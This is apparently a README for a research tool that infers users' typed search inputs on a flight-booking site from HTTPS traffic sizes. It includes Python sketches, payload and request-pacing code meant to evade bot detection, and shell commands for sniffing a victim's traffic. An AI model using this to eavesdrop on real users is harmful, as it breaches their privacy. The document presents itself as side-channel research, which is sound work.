Network analysis and Side Channel Leaks exploit over HTTPS

📚👉 Link to the full paper 👈📚

Disclaimer

This project was developed for research purposes only, and has been (and will be) run only locally, for experimental purposes.

While such a tool could be used by malicious users, I believe it can also be very useful to service providers: it lets them quantify the amount of data leaked by their service, and thus helps them protect their users' privacy.

Contribution

If you have any questions or anything to discuss about this project, please open an issue or a pull request to start a discussion.

The API studied here

Our study was carried out on a specific service, whose API calls to fetch the departure and destination of flights had the form:

Field Departure : /mv/marvel?f=h&where=cac&s=58&lc_cc=KR&lc=ko&v=v2&cv=4
Field Destination: /mv/marvel?f=h&where=gmp&s=58&lc_cc=KR&lc=ko&v=v2&cv=4

Both requests have the same shape, and the payload is the value of the "where" parameter in the URI.

The payload we use to carry out our attack has the form: /mv/marvel?f=h&where=[GENERATED]&s=58&lc_cc=KR&lc=ko&v=v2&cv=4, where [GENERATED] is a user entry generated by one of our modules.
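As a minimal sketch of how such a request path can be assembled, the helper below fills the "where" parameter and keeps the other query parameters fixed. The function name `build_path` and the constant `FIXED_PARAMS` are hypothetical and are not taken from generator.py or apiCaller.py; the parameter values are copied from the example URIs above.

```python
from urllib.parse import urlencode

# Query parameters copied from the example URIs; only "where" varies.
FIXED_PARAMS = {"s": "58", "lc_cc": "KR", "lc": "ko", "v": "v2", "cv": "4"}


def build_path(generated):
    """Return the request path for one generated user entry (hypothetical helper)."""
    # Dict order is preserved, so the parameters appear in the same order as in the examples.
    params = {"f": "h", "where": generated, **FIXED_PARAMS}
    return "/mv/marvel?" + urlencode(params)


if __name__ == "__main__":
    print(build_path("cac"))
```

Using `urlencode` also percent-encodes any character in the generated entry that is not safe in a query string.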

Note: By playing around with the API, we observed that no destination name was more than 15 characters long. Hence, we can limit the length of the generated string to 15. (For efficiency, we could even look for the smallest number of characters that uniquely identifies every destination/departure, in order to generate a minimum number of payloads. This would speed up the search by limiting the number of API calls, which results in a smaller search tree.)
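To illustrate why the length limit matters, here is a small sketch of an exhaustive payload generator. It assumes the entries are made of lowercase ASCII letters only, which is our assumption for the example and not something established by the study; `generate_payloads` is a hypothetical name, not the interface of generator.py.

```python
from itertools import product
from string import ascii_lowercase


def generate_payloads(max_length, alphabet=ascii_lowercase):
    """Yield every string over `alphabet` of length 1 to max_length, shortest first."""
    for length in range(1, max_length + 1):
        for letters in product(alphabet, repeat=length):
            yield "".join(letters)


if __name__ == "__main__":
    # With 26 letters there are 26 + 26**2 = 702 payloads of length <= 2.
    print(sum(1 for _ in generate_payloads(2)))
```

The number of payloads grows as 26^n with the maximum length n, so every character removed from the limit divides the number of API calls by roughly 26.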

Note2: To prevent our requests from being dropped by the server, we introduce an artificial delay between requests, in order to look more like a "normal" user and limit the chances of being flagged as a bot.
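One possible way to add such a delay is to wait a random amount of time between two consecutive payloads. The sketch below is only an illustration: the name `paced` and the default bounds of 0.5 and 2.0 seconds are assumptions, not the values used by apiCaller.py.

```python
import random
import time


def paced(payloads, min_delay=0.5, max_delay=2.0, sleep=time.sleep, rng=random.uniform):
    """Yield payloads one by one, pausing a random time between two of them.

    `sleep` and `rng` are injectable so the pacing can be tested without waiting.
    """
    for index, payload in enumerate(payloads):
        if index > 0:
            # No pause before the first payload, a random one before every other.
            sleep(rng(min_delay, max_delay))
        yield payload


if __name__ == "__main__":
    for entry in paced(["c", "ca", "cac"], min_delay=0.1, max_delay=0.3):
        print(entry)
```

A randomized pause avoids the perfectly regular request rhythm that a fixed delay would produce.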

Overview

Before detailing the architecture of the project (see next section), we give here a very brief overview of our study.

The idea here was to develop a tool that the attacker uses to generate a large set of payloads and simulate user input on the target website. That way, a request is sent to the server for every payload in the set, and the corresponding response is received.

As a consequence, the attacker learns the size of each request and each response for every payload in the pre-computed set. The attacker can then sniff the victim's traffic and compare the observed sizes with these "pre-computed" values to see what the victim is doing.

In a nutshell, this tool produces a trace of the interactions between the attacker and the targeted service (pre-computation), and then uses this trace to infer what a victim using the targeted service is doing (attack/exploit).
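The comparison step can be sketched as a lookup of an observed size in the pre-computed values. The dictionary layout (payload mapped to a size in bytes), the sizes themselves, and the `tolerance` parameter are assumptions made for this example; they do not describe the actual format of the DB.

```python
def candidates_for(observed_size, database, tolerance=0):
    """Return the payloads whose pre-computed size is within `tolerance` bytes of the observation."""
    return sorted(
        payload
        for payload, size in database.items()
        if abs(size - observed_size) <= tolerance
    )


if __name__ == "__main__":
    # Illustrative sizes only, not measurements from the study.
    database = {"cac": 512, "gmp": 530, "cdg": 512}
    print(candidates_for(512, database))
    print(candidates_for(528, database, tolerance=2))
```

When several payloads share the same size, the lookup returns all of them, which is why a single observation is not always enough to identify the input.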

Architecture of the project

The project is split into several parts. Each file has its own purpose and represents one task in the network analysis process.

generator.py: Module used to generate payloads to build the DB
apiCaller.py: Module dedicated to sending HTTPS requests for all payloads generated by the generator. The goal here is to test all possible actions of the user and record them in a DB.

The output of this module is a file (timingX.json, where X is the number of the trace) in which every payload is associated with its request time, response time, and content length. These timestamps are used later on to map the network traffic to the specific request/response.

traceBuilderWorker.sh: Bash script that records the network trace of a session in which we test all the payloads. The output of this "module" is a network traffic file (analysisX.pcap, where X is the number of the trace). To generate the network traffic trace, this script launches tcpdump and calls apiCaller.py.
traceBuilderManager.sh: Bash script which launches the desired number of traceBuilderWorkers in order to generate numerous network traces. The idea here is to record many network traces in order to diminish the impact of the network noise on our dataset.
traceAnalyzer.py: Module which analyses the network trace of the corresponding traceBuilderWorkers and maps the payloads to their traffic, in order to get the number of bytes sent over the network that correspond to each payload.
dbBuilder.py: Module that launches one traceAnalyzer.py per network trace to analyze, each in its own thread. We run them in parallel to speed up the trace analysis. After collecting the results of the traceAnalyzers, the dbBuilder reads them all and computes, for each payload, the mean of the traffic associated with it over all traces. This step aims to reduce the effect of network noise and helps achieve better accuracy. [TODO:] Find a better statistic than the mean to combine the values from the different traces. The mean is too sensitive to outliers and biased values.
attackPreComputation.sh: Bash module that combines all previous modules in order to build and precompute the DB of the attacker
networkAnalyzer.py: Module used to sniff the victim network and infer his inputs based on the precomputed database
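The two analysis steps above (mapping traffic to payloads through the recorded timestamps, then combining several traces) can be sketched as follows. This is an illustration under stated assumptions, not the code of traceAnalyzer.py or dbBuilder.py: the function names, the `(request_time, response_time)` layout, and the `(timestamp, size)` packet tuples are all hypothetical. The median is shown only as one possible candidate for the TODO above, since it is less affected by outliers than the mean.

```python
from statistics import mean, median


def bytes_per_payload(timings, packets):
    """Sum the sizes of the packets seen inside each payload's time window.

    timings: dict payload -> (request_time, response_time)  (assumed layout)
    packets: iterable of (timestamp, size_in_bytes)         (assumed layout)
    """
    totals = {payload: 0 for payload in timings}
    for timestamp, size in packets:
        for payload, (start, end) in timings.items():
            if start <= timestamp <= end:
                totals[payload] += size
                break  # a packet is attributed to at most one payload
    return totals


def aggregate(traces, reducer=mean):
    """Combine per-trace totals into a single value per payload."""
    merged = {}
    for trace in traces:
        for payload, total in trace.items():
            merged.setdefault(payload, []).append(total)
    return {payload: reducer(values) for payload, values in merged.items()}


if __name__ == "__main__":
    timings = {"a": (0.0, 1.0), "b": (2.0, 3.0)}
    packets = [(0.1, 100), (0.5, 50), (1.5, 999), (2.2, 200)]
    print(bytes_per_payload(timings, packets))
    traces = [{"a": 150}, {"a": 152}, {"a": 900}]  # the third trace is noisy
    print(aggregate(traces, mean), aggregate(traces, median))
```

In the usage example, one noisy trace pulls the mean far from the two consistent measurements, while the median stays at 152.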

Run the project in Docker

Build the image and run the container:

docker build -t sc-leaks .
docker run -ti --net=host --name cont-leaks sc-leaks

Set up the environment variables:

export ATTACKER_IP=`ifconfig eth0 | grep 'inet addr' | cut -d: -f2 | awk '{print $1}'`
nslookup www.[target-server].com
export SERVER_IP=[result of the nslookup]
cd src

Run the precomputation of the attack:

sudo ./attackPreComputation.sh [NumberOfNetworkTracesToUseToGenerateTheDB] [payloadMaxLength] $ATTACKER_IP $SERVER_IP [interfaceToListenTo]

For example, run:

sudo ./attackPreComputation.sh 1 1 $ATTACKER_IP $SERVER_IP eth0

Run the attack:

[In another terminal (let's call it Terminal2, and the previous one: Terminal1)]
docker exec -ti cont-leaks "/bin/sh"

[In terminal 1]
# Attack against yourself
export VICTIM_IP=`ifconfig eth0 | grep 'inet addr' | cut -d: -f2 | awk '{print $1}'`
python networkAnalyzer.py [interface] $VICTIM_IP $SERVER_IP

[In terminal 2]
cd src
python manualApiCaller.py auto
# Hit enter and observe the output of Terminal 1

Software implementation

Use PyShark to do some network analysis
Input of the entire tool:
- URL of the website
- The input should also contain the IP addresses of:
  - The victim/target
  - The web app the victim is using
- URLs used by the web app to fetch data as the user types (the URLs used to fetch data with AJAX calls), plus possibly a cookie or at least the information needed to make the call (this differs from one API to another)
  - And also all the information needed to generate all the possible calls (type of payload we need to generate, length limit, and so on)
  - That way we can generate all kinds of payloads, add them to the URL to make the API calls, and get the sizes associated with the user input
- Build a tree containing all the possible inputs and the corresponding packet sizes
- Using the tree built in the previous step, detect the user input that is the most likely to have occurred
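The last two steps can be sketched with a prefix tree in which each node stores the size measured for one input prefix. The sketch assumes that the web app sends one request per keystroke, so that the attacker observes one size per typed character; the node layout, the function names, and the sizes in the usage example are hypothetical and are not taken from the project's code.

```python
def new_node():
    return {"size": None, "children": {}}


def build_tree(sizes):
    """Build a prefix tree from a dict mapping each input prefix to its measured size."""
    root = new_node()
    for text, size in sizes.items():
        node = root
        for char in text:
            node = node["children"].setdefault(char, new_node())
        node["size"] = size
    return root


def infer_inputs(root, observed_sizes, tolerance=0):
    """Return every input whose successive prefixes match the observed sizes, in order."""
    frontier = [("", root)]
    for observed in observed_sizes:
        next_frontier = []
        for text, node in frontier:
            for char, child in node["children"].items():
                size = child["size"]
                if size is not None and abs(size - observed) <= tolerance:
                    next_frontier.append((text + char, child))
        frontier = next_frontier
    return sorted(text for text, _ in frontier)


if __name__ == "__main__":
    # Illustrative sizes only, not measurements from the study.
    sizes = {"c": 300, "g": 300, "ca": 410, "cb": 420, "gm": 410, "cac": 515, "gmp": 520}
    tree = build_tree(sizes)
    print(infer_inputs(tree, [300, 410]))
    print(infer_inputs(tree, [300, 410, 515]))
```

Each additional observed size prunes the candidates that survived the previous keystroke, so inputs that are ambiguous after two characters can become unique after three.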

Ideas

It would be interesting to see whether the side-channel leaks discovered in Chrome's event loop could be used to improve the attack.
Coupled with network analysis, this could be very efficient and could make an attacker almost certain of what the victim is actually doing on their computer.

References

"Side-Channel Leaks in Web Applications: a Reality Today, a Challenge Tomorrow", Shuo Chen et al.
Traffic Analysis of an SSL/TLS Session

AntoineRondelet / side-channel-exploit-https